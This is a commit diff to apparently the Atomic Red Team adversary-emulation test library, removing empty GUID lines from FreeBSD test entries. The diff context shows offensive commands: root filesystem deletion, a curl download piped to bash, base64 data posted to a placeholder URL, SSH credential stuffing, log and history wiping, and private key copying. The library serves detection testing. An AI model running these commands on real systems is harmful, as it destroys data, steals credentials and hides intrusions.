Remove auto_generated_guid lines from new entries

Some other tiny modifications
2023-06-09 09:11:41 -05:00
parent 74e8721392
commit 3b8d0af302
49 changed files with 1 additions and 85 deletions
@@ -49,7 +49,6 @@ atomic_tests:
      rm -f "#{output_file}"

 - name: Dump individual process memory with sh on FreeBSD (Local)
-  auto_generated_guid: 
  description: |
    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
    copy process memory to an external file so it can be searched or exfiltrated later.
@@ -21,7 +21,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Access /etc/master.passwd (Local)
-  auto_generated_guid: 
  description: |
    /etc/master.passwd file is accessed in FreeBSD environments
  supported_platforms:
@@ -46,7 +46,6 @@ atomic_tests:
      systemctl --type=service
    name: bash
 - name: System Service Discovery - service
-  auto_generated_guid: 
  description: |
    Enumerates system service using service
  supported_platforms:
@@ -54,7 +54,6 @@ atomic_tests:
      if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
    name: sh
 - name: System Network Configuration Discovery (freebsd)
-  auto_generated_guid: 
  description: |
    Identify network configuration information.

@@ -283,7 +283,6 @@ atomic_tests:
    name: sh

 - name: Remote System Discovery - netstat
-  auto_generated_guid: 
  description: |
    Use the netstat command to display the kernels routing tables.
  supported_platforms:
@@ -34,7 +34,6 @@ atomic_tests:
      rm /tmp/art.sh
    name: sh
 - name: Decode base64 Data into Script
-  auto_generated_guid: 
  description: |
    Creates a base64-encoded data file and decodes it into an executable shell script

@@ -34,7 +34,6 @@ atomic_tests:
    cleanup_command:
      rm -rf /tmp/atomic-test-T1036.006
 - name: Space After Filename (FreeBSD)
-  auto_generated_guid: 
  description: |
    Space after filename.
  supported_platforms:
@@ -54,7 +54,6 @@ atomic_tests:
    cleanup_command: | 
      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
 - name: rc.local (FreeBSD)
-  auto_generated_guid: 
  description: |
    Modify rc.local

@@ -29,7 +29,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Packet Capture FreeBSD using tshark or tcpdump
-  auto_generated_guid: 
  description: |
    Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.

@@ -248,7 +247,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Packet Capture FreeBSD using /dev/bpfN with sudo
-  auto_generated_guid: 
  description: |
    Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
  supported_platforms:
@@ -282,7 +280,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
-  auto_generated_guid: 
  description: |
    Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
  supported_platforms:
@@ -69,7 +69,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Port Scan Nmap for FreeBSD
-  auto_generated_guid:
  description: |
    Scan ports to check for listening ports with Nmap.

@@ -219,7 +219,6 @@ atomic_tests:
    command: |
      if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
 - name: Python3 http.server (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
  supported_platforms:
@@ -55,7 +55,6 @@ atomic_tests:
    command: |-
      echo "#{at_command}" | at #{time_spec}
 - name: At - Schedule a job freebsd
-  auto_generated_guid: 
  description: |
    This test submits a command to be run in the future by the `at` daemon.

@@ -55,7 +55,6 @@ atomic_tests:
      rm /etc/cron.monthly/#{cron_script_name}
      rm /etc/cron.weekly/#{cron_script_name}
 - name: Cron - Add script to /etc/cron.d folder
-  auto_generated_guid: 
  description: |
    This test adds a script to /etc/cron.d folder configured to execute on a schedule.
  supported_platforms:
@@ -88,7 +88,6 @@ atomic_tests:
    cleanup_command: |
      unset PROMPT_COMMAND
 - name: Logging sh history to syslog/messages
-  auto_generated_guid: 
  description: |
    There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.

@@ -169,7 +169,6 @@ atomic_tests:
      echo -n "$ART" |base64 -d |/bin/bash
      unset ART 
 - name: Obfuscated command line scripts (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
  supported_platforms:
@@ -206,7 +205,6 @@ atomic_tests:
    cleanup_command: | 
      userdel art
 - name: Change login shell (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. 
  supported_platforms:
@@ -243,7 +241,6 @@ atomic_tests:
    cleanup_command: | 
      unset ART
 - name: Environment variable scripts (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
  supported_platforms:
@@ -290,7 +287,6 @@ atomic_tests:
      rm /tmp/art.txt

 - name: Detecting pipe-to-shell (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
  supported_platforms:
@@ -15,7 +15,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: rm -rf
-  auto_generated_guid: 
  description: |
    Delete messages and security logs
  supported_platforms:
@@ -52,7 +51,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Truncate system log files via truncate utility (freebsd)
-  auto_generated_guid: 
  description: |
    This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
  supported_platforms:
@@ -77,7 +75,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
-  auto_generated_guid: 
  description: |
    The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
  supported_platforms:
@@ -114,7 +111,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Overwrite FreeBSD system log via echo utility
-  auto_generated_guid: 
  description: |
    This test overwrites the contents of system log file with an empty string using echo utility
  supported_platforms:
@@ -148,11 +144,10 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Delete system log files via unlink utility (freebsd)
-  auto_generated_guid: 
  description: |
    This test deletes the messages log file using unlink utility
  supported_platforms:
-  - macos
+  - freebsd
  executor:
    command: |
      unlink /var/log/messages
@@ -13,7 +13,6 @@ atomic_tests:
      rm ~/.bash_history
    name: sh
 - name: Clear sh history (rm)
-  auto_generated_guid: 
  description: |
    Clears sh history via rm
  supported_platforms:
@@ -34,7 +33,6 @@ atomic_tests:
      echo "" > ~/.bash_history
    name: sh
 - name: Clear sh history (echo)
-  auto_generated_guid: 
  description: |
    Clears sh history via echo
  supported_platforms:
@@ -55,7 +53,6 @@ atomic_tests:
      cat /dev/null > ~/.bash_history
    name: sh
 - name: Clear sh history (cat dev/null)
-  auto_generated_guid: 
  description: |
    Clears sh history via cat /dev/null
  supported_platforms:
@@ -77,7 +74,6 @@ atomic_tests:
      ln -sf /dev/null ~/.bash_history
    name: sh
 - name: Clear sh history (ln dev/null)
-  auto_generated_guid: 
  description: |
    Clears sh history via a symlink to /dev/null
  supported_platforms:
@@ -97,7 +93,6 @@ atomic_tests:
      truncate -s0 ~/.bash_history
    name: sh
 - name: Clear sh history (truncate)
-  auto_generated_guid: 
  description: |
    Clears sh history via truncate
  supported_platforms:
@@ -120,7 +115,6 @@ atomic_tests:
      history -c
    name: sh
 - name: Clear history of a bunch of shells (freebsd)
-  auto_generated_guid: 
  description: |
    Clears the history of a bunch of different shell types by setting the history size to zero
  supported_platforms:
@@ -188,7 +182,6 @@ atomic_tests:
    name: sh

 - name:  Disable sh History Logging with SSH -T (freebsd)
-  auto_generated_guid: 
  description: |
    Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
  supported_platforms:
@@ -178,7 +178,6 @@ atomic_tests:
      rm -rf / --no-preserve-root > /dev/null 2> /dev/null
    name: bash
 - name: Delete Filesystem - FreeBSD
-  auto_generated_guid: 
  description: |
    This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
  supported_platforms:
@@ -36,7 +36,6 @@ atomic_tests:
      curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
    name: bash
 - name: Stage data from Discovery.sh (freebsd)
-  auto_generated_guid: 
  description: |
    Utilize curl to download discovery.sh and execute a basic information gathering shell script
  supported_platforms:
@@ -119,7 +119,6 @@ atomic_tests:
    cleanup_command: |
      userdel -r art 
 - name: Create local account (FreeBSD)
-  auto_generated_guid: 
  description: |
    An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
  supported_platforms:
@@ -158,7 +157,6 @@ atomic_tests:
    cleanup_command: |
      userdel -r art 
 - name: Reactivate a locked/expired account (FreeBSD)
-  auto_generated_guid: 
  description: |
    A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 

@@ -202,7 +200,6 @@ atomic_tests:
      cat /etc/passwd |grep nobody 
      # -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 - name: Login as nobody (freebsd)
-  auto_generated_guid: 
  description: |
    An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
  supported_platforms:
@@ -81,7 +81,6 @@ atomic_tests:
      sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
    name: bash
 - name: FreeBSD VM Check via Kernel Modules
-  auto_generated_guid: 
  description: |
    Identify virtual machine host kernel modules.
  supported_platforms:
@@ -363,7 +362,6 @@ atomic_tests:
      grep vmw /proc/modules
    name: sh
 - name: FreeBSD List Kernel Modules
-  auto_generated_guid: 
  description: |
    Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
  supported_platforms:
@@ -110,7 +110,6 @@ atomic_tests:
      rm -f #{output_file}
    name: sh
 - name: Show if a user account has ever logged in remotely (freebsd)
-  auto_generated_guid: 
  description: |
    Show if a user account has ever logged in remotely
  supported_platforms:
@@ -116,7 +116,6 @@ atomic_tests:
      killall tor > /dev/null 2>&1
    name: sh
 - name: Tor Proxy Usage - FreeBSD
-  auto_generated_guid: 
  description: |
    This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
    Upon successful execution, the tor proxy service will be launched. 
@@ -226,7 +226,6 @@ atomic_tests:
      userdel -fr art

 - name: SUDO Brute Force - FreeBSD
-  auto_generated_guid: 
  description: |
    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 

@@ -64,7 +64,6 @@ atomic_tests:
      for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done

 - name: SSH Credential Stuffing From FreeBSD
-  auto_generated_guid: 
  description: |
    Using username,password combination from a password dump to login over SSH.

@@ -70,7 +70,6 @@ atomic_tests:
      rm #{output_file}
    name: bash
 - name: X Windows Capture (freebsd)
-  auto_generated_guid: 
  description: |
    Use xwd command to collect a full desktop screenshot and review file with xwud
  supported_platforms:
@@ -122,7 +121,6 @@ atomic_tests:
      rm #{output_file}
    name: bash
 - name: Capture Linux Desktop using Import Tool (freebsd)
-  auto_generated_guid: 
  description: |
    Use import command from ImageMagick to collect a full desktop screenshot
  supported_platforms:
@@ -23,7 +23,6 @@ atomic_tests:
      curl -XPOST #{base64_data}.#{destination_url}
    name: sh
 - name: Base64 Encoded data (freebsd)
-  auto_generated_guid: 
  description: |
    Utilizing a common technique for posting base64 encoded data.
  supported_platforms:
@@ -47,7 +47,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Network Share Discovery - FreeBSD
-  auto_generated_guid: 
  description: |
    Network Share Discovery using smbstatus
  supported_platforms:
@@ -20,7 +20,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Create a user account on a FreeBSD system
-  auto_generated_guid: 
  description: |
    Create a user via pw
  supported_platforms:
@@ -130,7 +129,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: Create a new user in FreeBSD with `root` GID.
-  auto_generated_guid: 
  description: |
    Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
  supported_platforms:
@@ -139,7 +139,6 @@ atomic_tests:
      echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
      bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
 - name: Base64 decoding with shell utilities (freebsd)
-  auto_generated_guid: 
  description: |
    Use common shell utilities to decode a base64-encoded text string and echo it to the console
  supported_platforms:
@@ -166,7 +165,6 @@ atomic_tests:
      echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
      echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
 - name: FreeBSD b64encode Shebang in CLI
-  auto_generated_guid: 
  description: |
    Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. 
  supported_platforms:
@@ -12,7 +12,6 @@ atomic_tests:
      cat /etc/pam.d/common-password
    name: bash
 - name: Examine password complexity policy - FreeBSD
-  auto_generated_guid: 
  description: |
    Lists the password complexity policy to console on FreeBSD.
  supported_platforms:
@@ -57,7 +57,6 @@ atomic_tests:
      rm -f #{output_file} 2>/dev/null
    name: sh
 - name: List Google Chromium Bookmark JSON Files on FreeBSD
-  auto_generated_guid: 
  description: |
    Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file.
  supported_platforms:
@@ -192,7 +192,6 @@ atomic_tests:
      chattr -i #{file_to_modify}
    name: sh
 - name: chflags - Remove immutable file attribute
-  auto_generated_guid: 
  description: |
    Remove's a file's `immutable` attribute using `chflags`.
    This technique was used by the threat actor Rocke during the compromise of Linux web servers.
@@ -238,7 +237,6 @@ atomic_tests:
      #{compiled_file} /tmp/ T1222002
    name: sh
 - name: Chmod through c script (freebsd)
-  auto_generated_guid: 
  description: |
    chmods a file using a c script
  supported_platforms:
@@ -295,7 +293,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Chown through c script (freebsd)
-  auto_generated_guid: 
  description: |
    chowns a file to root using a c script
  supported_platforms:
@@ -16,7 +16,6 @@ atomic_tests:
      if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
      if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
 - name: Detect Virtualization Environment (FreeBSD)
-  auto_generated_guid: 
  description: |
    Detects execution in a virtualized environment.
    At boot, dmesg stores a log if a hypervisor is detected.
@@ -64,7 +64,6 @@ atomic_tests:
      ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
    name: sh
 - name: Security Software Discovery - pgrep (FreeBSD)
-  auto_generated_guid: 
  description: |
    Methods to identify Security Software on an endpoint
    when sucessfully executed, command shell is going to display AV/Security software it is running.
@@ -95,7 +95,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Reboot System via `halt` - FreeBSD
-  auto_generated_guid: 
  description: |
    This test restarts a FreeBSD system using `halt`.
  supported_platforms:
@@ -129,7 +128,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Reboot System via `poweroff` - FreeBSD
-  auto_generated_guid: 
  description: |
    This test restarts a FreeBSD system using `poweroff`.
  supported_platforms:
@@ -66,7 +66,6 @@ atomic_tests:
      systemctl daemon-reload
    name: bash
 - name: Create Systemd Service
-  auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
  description: |
    This test creates a Systemd service unit file and enables it as a service.
  supported_platforms:
@@ -40,7 +40,6 @@ atomic_tests:
      mv /tmp/T1546.004 ~/.bashrc
    name: sh
 - name: Add command to .shrc
-  auto_generated_guid: 
  description: |
    Adds a command to the .shrc file of the current user
  supported_platforms:
@@ -16,7 +16,6 @@ atomic_tests:
      rm -f /tmp/art-fish.txt
    name: sh
 - name: Trap EXIT (freebsd)
-  auto_generated_guid: 
  description: |
    Launch bash shell with command arg to create TRAP on EXIT.
    The trap executes script that writes to /tmp/art-fish.txt
@@ -51,7 +50,6 @@ atomic_tests:
      rm -f /tmp/art-fish.txt
    name: sh
 - name: Trap SIGINT (freebsd)
-  auto_generated_guid: 
  description: |
    Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
    The trap executes script that writes to /tmp/art-fish.txt
@@ -27,7 +27,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Make and modify binary from C source (freebsd)
-  auto_generated_guid: 
  description: |
    Make, change owner, and change file attributes on a C source code file
  supported_platforms:
@@ -72,7 +71,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Set a SetUID flag on file (freebsd)
-  auto_generated_guid: 
  description: |
    This test sets the SetUID flag on a file in FreeBSD.
  supported_platforms:
@@ -113,7 +111,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Set a SetGID flag on file (freebsd)
-  auto_generated_guid: 
  description: |
    This test sets the SetGID flag on a file in FreeBSD.
  supported_platforms:
@@ -21,7 +21,6 @@ atomic_tests:
      sudo vim /etc/sudoers

 - name: Sudo usage (freebsd)
-  auto_generated_guid: 
  description: |
    Common Sudo enumeration methods.

@@ -63,7 +62,6 @@ atomic_tests:
      sudo visudo -c -f /etc/sudoers

 - name: Unlimited sudo cache timeout (freebsd)
-  auto_generated_guid: 
  description: |
    Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.

@@ -104,7 +102,6 @@ atomic_tests:
      sudo visudo -c -f /etc/sudoers

 - name: Disable tty_tickets for sudo caching (freebsd)
-  auto_generated_guid: 
  description: |
    Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.

@@ -26,7 +26,6 @@ atomic_tests:
      cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
    name: sh
 - name: Search Through sh History
-  auto_generated_guid: 
  description: |
    Search through sh history for specifice commands we want to capture
  supported_platforms:
@@ -61,7 +61,6 @@ atomic_tests:
      rm -rf #{output_folder}
    name: sh
 - name: Copy Private SSH Keys with CP (freebsd)
-  auto_generated_guid: 
  description: |
    Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.
  supported_platforms:
@@ -113,7 +112,6 @@ atomic_tests:
      rm -rf #{output_folder}
    name: sh
 - name: Copy Private SSH Keys with rsync (freebsd)
-  auto_generated_guid: 
  description: |
    Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.
  supported_platforms:
@@ -167,7 +165,6 @@ atomic_tests:
      rm -rf #{output_folder}
    name: sh
 - name: Copy the users GnuPG directory with rsync (freebsd)
-  auto_generated_guid: 
  description: |
    Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.
  supported_platforms:
@@ -28,7 +28,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Install root CA on FreeBSD
-  auto_generated_guid: 
  description: |
    Creates a root CA with openssl
  supported_platforms:
@@ -30,7 +30,6 @@ atomic_tests:
    cleanup_command: |
      sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
 - name: Malicious PAM rule (freebsd)
-  auto_generated_guid: 
  description: |
    Inserts a rule into a PAM config and then tests it.

@@ -40,7 +40,6 @@ atomic_tests:
    name: sh
    elevation_required: true
 - name: Disable syslog (freebsd)
-  auto_generated_guid: 
  description: |
    Disables syslog collection
  supported_platforms:
@@ -19,7 +19,6 @@ atomic_tests:
      #{evil_command}
    name: sh
 - name: Disable history collection (freebsd)
-  auto_generated_guid: 
  description: |
    Disables history collection in shells
  supported_platforms:
@@ -119,7 +118,6 @@ atomic_tests:
    cleanup_command: |
      export HISTCONTROL=$(echo $TEST)
 - name: Setting the HISTSIZE environment variable
-  auto_generated_guid: 
  description: |
    An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.

@@ -157,7 +155,6 @@ atomic_tests:
    cleanup_command: |
      export HISTFILE=$(echo $TEST)
 - name: Setting the HISTFILE environment variable (freebsd)
-  auto_generated_guid: 
  description: |
    An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.

@@ -113,7 +113,6 @@ atomic_tests:
      ufw enable
      ufw status verbose
 - name: Stop/Start Packet Filter
-  auto_generated_guid: 
  description: |
    Stop the Packet Filter if installed.
  supported_platforms:
@@ -209,7 +208,6 @@ atomic_tests:
      { echo y; echo response; } | ufw delete 1
      ufw status numbered
 - name: Add and delete Packet Filter rules
-  auto_generated_guid: 
  description: |
    Add and delete a rule on the Packet Filter (PF) if installed and enabled. 
  supported_platforms:
@@ -38,7 +38,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: 'Auditing Configuration Changes on FreeBSD Host'
-  auto_generated_guid: 
  description: |
    Emulates modification of auditd configuration files
  supported_platforms:
@@ -98,7 +97,6 @@ atomic_tests:
    name: bash
    elevation_required: true
 - name: 'Logging Configuration Changes on FreeBSD Host'
-  auto_generated_guid: 
  description: |
    Emulates modification of syslog configuration.
  supported_platforms: